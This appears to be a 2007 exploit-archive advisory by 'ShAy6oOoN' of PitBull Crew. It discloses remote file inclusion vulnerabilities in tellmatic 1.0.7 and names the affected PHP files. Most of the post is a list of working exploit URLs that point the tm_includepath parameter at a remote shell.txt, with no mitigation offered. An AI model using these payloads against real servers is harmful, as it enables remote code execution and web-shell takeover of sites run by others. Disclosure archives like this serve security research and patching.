[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : tellmatic 1.0.7 Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-12-01
# Author : ShAy6oOoN
# Previous Title : Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability
# Next Title : Rayzz Script 2.0 Remote / Local File Inclusion Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : tellmatic 1.0.7
---------------------
Download : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------
http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt?
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r
Thanks To:
----------
str0ke
# www.Syue.com [2007-12-01]